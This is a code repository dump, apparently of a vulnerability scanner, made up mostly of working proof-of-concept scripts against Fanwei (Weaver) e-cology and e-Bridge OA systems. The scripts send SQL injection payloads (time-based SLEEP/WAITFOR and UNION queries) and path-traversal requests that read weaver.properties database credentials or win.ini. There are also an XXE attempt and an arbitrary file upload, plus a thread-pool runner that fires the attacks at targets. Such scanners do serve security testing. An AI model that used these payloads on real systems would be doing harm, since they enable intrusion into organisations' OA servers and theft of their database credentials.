15 | thread_pool.add_task(target, script) # 向线程池中添加当前目标和脚本
16 | thread_pool.start_threadpool()
17 |
18 |
19 | def attack(target, script):
20 | try:
21 | if common.get_value("pocinfo_dict")[script].attack(target):
22 | return True
23 | return False
24 | except:
25 | return False
26 |
--------------------------------------------------------------------------------
/poc_model.txt:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
12 | 'Connection':'close'
13 | }
14 | vurl = urllib.parse.urljoin(url, "/weaver/")
15 | try:
16 | response = requests(vurl, headers=headers)
17 | if response.status_code == 200 and 'DatabaseName' in response.text:
18 | relsult['vulnerable'] = True
19 | relsult['verify'] = vurl
20 | return relsult
21 |
22 | except:
23 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/TestFile_weaver_common_ctrl_upload.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/TestFile_weaver_common_ctrl_upload.zip
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/__pycache__/fanwei_Bsh_rce.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/__pycache__/fanwei_Bsh_rce.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/__pycache__/fanwei_WorkflowCenterTreeData_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/__pycache__/fanwei_WorkflowCenterTreeData_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/__pycache__/fanwei_common_ctrl_upload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/__pycache__/fanwei_common_ctrl_upload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ebridge/__pycache__/fanwei_ebridge_addResume_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ebridge/__pycache__/fanwei_ebridge_addResume_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ebridge/__pycache__/fanwei_ebridge_addTaste_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ebridge/__pycache__/fanwei_ebridge_addTaste_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ebridge/fanwei_ebridge_addTaste_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '泛微云桥 e-Bridge addTaste接口SQL注入漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
12 | 'Accept-Encoding': 'gzip, deflate',
13 | 'Connection':'close'
14 | }
15 | vurl = urllib.parse.urljoin(url, "/taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(5-(IF(18015%3e3469,0,4)))))mKjk)%20OR%20%27KQZm%27=%27REcX")
16 | try:
17 | response = requests.get(vurl, headers=headers)
18 | if response.status_code not in range(400, 499) and response.elapsed.total_seconds() > 5:
19 | relsult['vulnerable'] = True
20 | relsult['verify'] = vurl
21 | return relsult
22 |
23 | except:
24 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_cology_FileDownload_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_cology_FileDownload_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_CptDwrUtil_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_CptDwrUtil_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_Getdata_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_Getdata_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_HrmCareerApplyPerView_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_HrmCareerApplyPerView_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_HrmService_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_HrmService_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_KtreeUploadAction_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_KtreeUploadAction_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_LoginSSO_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_LoginSSO_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_ProcessOverRequestByXml_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_ProcessOverRequestByXml_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_ResourceServlet_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_ResourceServlet_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_SignatureDownLoad_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_SignatureDownLoad_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_SptmForPortalThumbnail_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_SptmForPortalThumbnail_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_WorkPlanService_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_WorkPlanService_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_WorkflowServiceXml_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_WorkflowServiceXml_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_XmlRpcServlet_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_XmlRpcServlet_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_browser_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_browser_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_getE9DevelopAllNameValue2_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_getE9DevelopAllNameValue2_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_getLabelByModule_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_getLabelByModule_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_getsqldata_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_getsqldata_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_jqueryFileTree_direct.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_jqueryFileTree_direct.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_setup_unauth.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_setup_unauth.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_uploadOperation_fileupload_2022.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_uploadOperation_fileupload_2022.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_v8_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_v8_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_verifyquicklogin_loginbypass_2022.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_verifyquicklogin_loginbypass_2022.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_workflowservicexml_rce.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_workflowservicexml_rce.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_cology_FileDownload_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '泛微OA-E-Cology-FileDownload文件读取漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0',
12 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
13 | 'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
14 | 'Accept-Encoding': 'gzip, deflate',
15 | 'Connection': 'close',
16 | 'Upgrade-Insecure-Requests': '1'
17 | }
18 | vurl = urllib.parse.urljoin(url, "/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/prop/weaver.properties")
19 | try:
20 | response = requests.get(vurl, headers=headers, timeout=5)
21 | if response.status_code == 200 and 'password' in response.text:
22 | relsult['vulnerable'] = True
23 | relsult['verify'] = vurl
24 | return relsult
25 |
26 | except:
27 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_CptDwrUtil_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '泛微E-cology 8 CptDwrUtil 存在SQL注入漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36',
12 | 'Connection': 'close',
13 | 'Content-Type': 'text/plain',
14 | 'Accept-Encoding': 'gzip'
15 | }
16 | data = '''callCount=1&page=httpSessionId=&scriptSessionId=&c0-scriptName=DocDwrUtil&c0-methodName=ifNewsCheckOutByCurrentUser&c0-id=0&batchId=0&c0-param1=string:1&c0-param0=string:1 WAITFOR DELAY '0:0:5' '''
17 | vurl = urllib.parse.urljoin(url, "/dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr")
18 | try:
19 | response = requests.post(vurl, headers=headers, data=data, timeout=10)
20 | if response.status_code not in range(400, 499) and response.elapsed.total_seconds() > 5:
21 | relsult['vulnerable'] = True
22 | relsult['verify'] = vurl
23 | return relsult
24 |
25 | except:
26 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_Getdata_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '泛微OA-E-Cology-Getdata.jsp存在SQL注入漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0',
12 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
13 | 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
14 | 'Accept-Encoding': 'gzip, deflate',
15 | 'Connection': 'close',
16 | 'Cookie': 'ecology_JSessionId=abcdTYJZpKflG5NUo9X0y; testBanCookie=test',
17 | 'Upgrade-Insecure-Requests': '1'
18 | }
19 | vurl = urllib.parse.urljoin(url, "/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=WAITFOR+DELAY+%270%3A0%3A5%27")
20 | try:
21 | response = requests.get(vurl, headers=headers)
22 | if response.status_code not in range(400, 499) and response.elapsed.total_seconds() > 5:
23 | relsult['vulnerable'] = True
24 | relsult['verify'] = vurl
25 | return relsult
26 |
27 | except:
28 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_HrmCareerApplyPerView_sqli.py:
--------------------------------------------------------------------------------
1 | import urllib
2 |
3 | import requests
4 |
5 | def verify(url):
6 | relsult = {
7 | 'name': '泛微E-ecology 8 HrmCareerApplyPerView 存在SQL注入漏洞',
8 | 'vulnerable': False,
9 | 'url': url
10 | }
11 | timeout = 3
12 | headers = {
13 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
14 | 'Accept-Encoding': 'gzip, deflate',
15 | 'Connection':'close'
16 | }
17 | vurl = urllib.parse.urljoin(url, "/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1+union+select+1,2,sys.fn_sqlvarbasetostr(HashBytes('MD5','abc')),db_name(1),5,6,7")
18 | try:
19 | response = requests.get(vurl, headers=headers, timeout=timeout)
20 | if response.status_code == 200 and '0x900150983cd24fb0d6963f7d28e17f72' in response.text:
21 | relsult['vulnerable'] = True
22 | relsult['verify'] = vurl
23 | return relsult
24 | except:
25 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_KtreeUploadAction_fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '泛微E-Cology-KtreeUploadAction任意文件上传漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0',
12 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
13 | 'Accept-Encoding': 'gzip, deflate, br',
14 | 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
15 | 'Cache-Control': 'max-age=0',
16 | 'Connection': 'close',
17 | 'Content-Type': 'multipart/form-data; boundary=--------1638451160',
18 | 'Cookie': 'Secure; JSESSIONID=abc6xLBV7S2jvgm3CB50w; Secure; testBanCookie=test',
19 | 'Upgrade-Insecure-Requests': '1'
20 | }
21 | data = '''
22 | ----------1638451160
23 | Content-Disposition: form-data; name="test"; filename="test.txt"
24 | Content-Type: application/octet-stream
25 |
26 | test
27 | ----------1638451160--'''
28 | vurl = urllib.parse.urljoin(url, "/weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image")
29 | try:
30 | response = requests.post(vurl, headers=headers, data=data)
31 | if response.status_code == 200 and '.txt' in response.text:
32 | relsult['vulnerable'] = True
33 | return relsult
34 |
35 | except:
36 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_LoginSSO_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '泛微E-cology-LoginSSO.jsp存在SQL注入漏洞(CNVD-2021-33202)',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
12 | 'Accept-Encoding': 'gzip, deflate',
13 | 'Connection':'close'
14 | }
15 | vurl = urllib.parse.urljoin(url, "/upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20@@version%20as%20id%20from%20HrmResourceManager")
16 | try:
17 | response = requests.get(vurl, headers=headers, timeout=5)
18 | if response.status_code == 200 and 'Microsoft' in response.text:
19 | relsult['vulnerable'] = True
20 | relsult['verify'] = vurl
21 | return relsult
22 |
23 | except:
24 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_ProcessOverRequestByXml_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '泛微e-cology-ProcessOverRequestByXml接口存在任意文件读取漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36',
12 | 'Accept-Encoding': 'gzip, deflate',
13 | 'Accept': '*/*',
14 | 'Connection': 'close',
15 | 'Content-Type': 'application/xml',
16 | 'Content-Length': '146'
17 | }
18 | data = ''']>&test;'''
19 | vurl = urllib.parse.urljoin(url, "/rest/ofs/ProcessOverRequestByXml")
20 | try:
21 | response = requests.post(vurl, headers=headers, data=data)
22 | if response.status_code == 200 and '[files]' in response.text:
23 | relsult['vulnerable'] = True
24 | relsult['verify'] = vurl
25 | return relsult
26 |
27 | except:
28 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_ResourceServlet_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '泛微-OA系统ResourceServlet接口任意文件读取漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
12 | 'Accept-Encoding': 'gzip, deflate',
13 | 'Connection':'close'
14 | }
15 | vurl = urllib.parse.urljoin(url, "/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/prop/weaver.properties")
16 | try:
17 | response = requests.get(vurl, headers=headers, timeout=3)
18 | if response.status_code == 200 and 'DatabaseName' in response.text:
19 | relsult['vulnerable'] = True
20 | relsult['verify'] = vurl
21 | return relsult
22 |
23 | except:
24 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_SignatureDownLoad_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '泛微E-Cology系统接口SignatureDownLoad存在SQL注入漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36',
12 | 'Content-Type': 'application/x-www-form-urlencoded',
13 | 'Accept-Encoding': 'gzip, deflate',
14 | 'Connection': 'close'
15 | }
16 | vurl = urllib.parse.urljoin(url, "/weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27../ecology/WEB-INF/prop/weaver.properties%27")
17 | try:
18 | response = requests.get(vurl, headers=headers, timeout=3)
19 | if response.status_code == 200 and 'cology' in response.text:
20 | relsult['vulnerable'] = True
21 | relsult['verify'] = vurl
22 | return relsult
23 |
24 | except:
25 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_SptmForPortalThumbnail_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '泛微OA-E-cology8-SptmForPortalThumbnail.jsp任意文件读取漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
12 | 'Connection':'close'
13 | }
14 | vurl = urllib.parse.urljoin(url, "/portal/SptmForPortalThumbnail.jsp?preview=../ecology/WEB-INF/prop/weaver.properties")
15 | try:
16 | response = requests.get(vurl, headers=headers, timeout=5)
17 | if response.status_code == 200 and 'password' in response.text:
18 | relsult['vulnerable'] = True
19 | relsult['verify'] = vurl
20 | return relsult
21 |
22 | except:
23 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_WorkPlanService_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '泛微e-cology9接口WorkPlanService前台SQL注入漏洞(XVE-2024-18112)',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
12 | 'Content-Type': 'text/xml;charset=UTF-8',
13 | 'Connection':'close'
14 | }
15 | data='''
16 |
17 |
18 |
19 |
20 |
21 | (SELECT 8544 FROM (SELECT(SLEEP(5-(IF(27=27,0,5)))))NZeo)
22 |
23 | 22
24 |
25 |
26 |
27 | '''
28 | vurl = urllib.parse.urljoin(url, "/services/WorkPlanService")
29 |
30 | try:
31 | response = requests.post(vurl, headers=headers, data=data)
32 | if response.status_code and response.elapsed.total_seconds() > 4:
33 | relsult['vulnerable'] = True
34 | relsult['verify'] = vurl
35 | return relsult
36 |
37 | except:
38 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_WorkflowServiceXml_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '泛微OA-E-Cology接口WorkflowServiceXml存在SQL注入漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36',
12 | 'Content-Type': 'text/xml',
13 | 'Accept-Encoding': 'gzip',
14 | 'Content-Length': '487'
15 | }
16 | data = '''
17 |
18 |
19 | 1
20 | 1
21 | 1
22 | 1
23 |
24 | 1=1 AND 2=2;WAITFOR DELAY '0:0:5'
25 |
26 |
27 |
28 | '''
29 | vurl = urllib.parse.urljoin(url, "/services/WorkflowServiceXml")
30 | try:
31 | response = requests.post(vurl, headers=headers, data=data)
32 | if response.status_code not in range(400, 499) and response.elapsed.total_seconds() > 5:
33 | relsult['vulnerable'] = True
34 | relsult['verify'] = vurl
35 | return relsult
36 |
37 | except:
38 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_XmlRpcServlet_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '泛微e-cology9接口XmlRpcServlet存在任意文件读取漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15',
12 | 'Content-Type': 'application/xml',
13 | 'Accept-Encoding': 'gzip',
14 | 'Content-Length': '201'
15 | }
16 | data = '''
17 |
18 |
19 | WorkflowService.getAttachment
20 |
21 |
22 | c://windows/win.ini
23 |
24 |
25 |
26 | '''
27 | vurl = urllib.parse.urljoin(url, "/weaver/org.apache.xmlrpc.webserver.XmlRpcServlet")
28 | try:
29 | response = requests.post(vurl, headers=headers, data=data)
30 | if response.status_code == 200 and 'base64' in response.text:
31 | relsult['vulnerable'] = True
32 | relsult['verify'] = vurl
33 | return relsult
34 |
35 | except:
36 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_getE9DevelopAllNameValue2_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '泛微getE9DevelopAllNameValue2接口存在任意文件读取漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0',
12 | 'Accept': '*/*',
13 | 'Connection': 'Keep-Alive',
14 | 'X-Forwarded-For': '127.0.0.1',
15 | 'X-Originating': '127.0.0.1',
16 | 'X-Remote-IP': '127.0.0.1',
17 | 'X-Remote-Addr': '127.0.0.1'
18 | }
